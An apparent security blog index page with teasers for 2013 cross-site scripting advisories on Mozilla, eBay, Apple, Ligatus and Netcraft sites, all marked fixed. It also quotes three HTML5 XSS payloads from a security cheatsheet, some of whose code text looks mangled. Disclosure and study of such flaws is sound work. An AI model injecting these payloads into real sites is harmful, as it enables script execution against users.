Warning: opendir(/var/www/html/web1/serendipity/plugins/serendipity_event_dpsyntaxhighlighter/sh/3.0.83.2/scripts/): failed to open dir: No such file or directory in /var/www/html/web1/serendipity/plugins/serendipity_event_dpsyntaxhighlighter/serendipity_event_dpsyntaxhighlighter.php on line 26

Warning: Invalid argument supplied for foreach() in /var/www/html/web1/serendipity/plugins/serendipity_event_dpsyntaxhighlighter/serendipity_event_dpsyntaxhighlighter.php on line 170
Skip to content

SSCHADV2013-010 - developer.mozilla.org DOMbased Cross-site Scripting vulnerability

Advisory:
developer.mozilla.org - DOM based Cross-site Scripting vulnerability
Advisory ID:
SSCHADV2013-010
Author:
Stefan Schurtz
Affected Software:
Successfully tested on developer.mozilla.org
Vendor URL:
Vendor Status:
fixed
 
 
==========================
Vulnerability Description

==========================

 
The website 'developer.mozilla.org' is prone to a DOM based XSS vulnerability
 
 
Continue reading "SSCHADV2013-010 - developer.mozilla.org DOMbased Cross-site Scripting vulnerability"

HTML5 Security Cheatsheet

Here you can find the HTML5 Security Cheatsheet, which is a nice source of some good XSS payloads.

For Example:

XSS via formaction – requiring user interaction (1)

A vector displaying the HTML5 form and formaction capabilities for form hijacking outside the actual form
 
<form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>
 
Self-including DOM Worker XSS
 
A self-including code snippet utilizing a DOM worker and firing a message event to itself causing script execution
 
0?<script>Worker("#").onmessage=function()eval(.data)</script> :postMessage(importScripts(‘data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk’))
 
Self-hijacking JSON literals
 
In case parts of a JSON literal are controlled by user input there’s a risk to allow auto-harvesting values from later object members.
 
<script>[{‘a’:Object.prototype.defineSetter(‘b’,function(){alert(arguments[0])}),‘b’:[‘secret’]}]</script>
 

SSCHADV2013-011 - pages.ebay.de - DOM based Cross-site Scripting vulnerability

Advisory:
pages.ebay.de – DOM based Cross-site Scripting vulnerability
Advisory ID:
SSCHADV2013-011
Author:
Stefan Schurtz
Affected Software:
Successfully tested on pages.ebay.de
Vendor URL:
Vendor Status:
fixed
 
======================
Vulnerability Description
======================

 
The website ‘pages.ebay.de’ is prone to a DOM based XSS vulnerability
 
Continue reading "SSCHADV2013-011 - pages.ebay.de - DOM based Cross-site Scripting vulnerability"

SSCHADV2013-009 - store.apple.com - DOM based Cross-site Scripting vulnerability

Advisory:
store.apple.com – DOM based Cross-site Scripting vulnerability
Advisory ID:
SSCHADV2013-009
Author:
Stefan Schurtz
Affected Software:
Successfully tested on store.apple.com
Vendor URL:
Vendor Status:
fixed
 
======================
Vulnerability Description
======================
 
The website ‘store.apple.com’ is prone to a DOM based XSS vulnerability
 
Continue reading "SSCHADV2013-009 - store.apple.com - DOM based Cross-site Scripting vulnerability"

SSCHADV2013-007 - Ligatus Advertising - DOM Based Cross-site Scripting vulnerability

Advisory:
Ligatus Advertising – DOM Based Cross-site Scripting vulnerability
Advisory ID:
SSCHADV2013-007
Author:
Stefan Schurtz
Affected Software:
Successfully tested on a.ligatus.com
Vendor URL:
Vendor Status:
fixed
 
======================
Vulnerability Description
======================
 
The ‘et’-Parameter in Ligatus Advertising is prone to a DOM Based XSS vulnerability.
 
Continue reading "SSCHADV2013-007 - Ligatus Advertising - DOM Based Cross-site Scripting vulnerability"

SSCHADV2013-008 - www.netcraft.com - Search Form Cross-site Scripting vulnerability

Advisory:
www.netcraft.com – Search Form Cross-site Scripting vulnerability
Advisory ID:
SSCHADV2013-008
Author:
Stefan Schurtz
Affected Software:
Successfully tested on www.netcraft.com
Vendor URL:
Vendor Status:
fixed
 
======================
Vulnerability Description
======================
 
The ‘q’-Parameter in the Search Form on www.netcraft.com is prone to a XSS vulnerability
 
Continue reading "SSCHADV2013-008 - www.netcraft.com - Search Form Cross-site Scripting vulnerability"
Imprint | Contact | Privacy Statement

Warning: opendir(/var/www/html/web1/serendipity/plugins/serendipity_event_dpsyntaxhighlighter/sh/3.0.83.2/scripts/): failed to open dir: No such file or directory in /var/www/html/web1/serendipity/plugins/serendipity_event_dpsyntaxhighlighter/serendipity_event_dpsyntaxhighlighter.php on line 26

Warning: Invalid argument supplied for foreach() in /var/www/html/web1/serendipity/plugins/serendipity_event_dpsyntaxhighlighter/serendipity_event_dpsyntaxhighlighter.php on line 170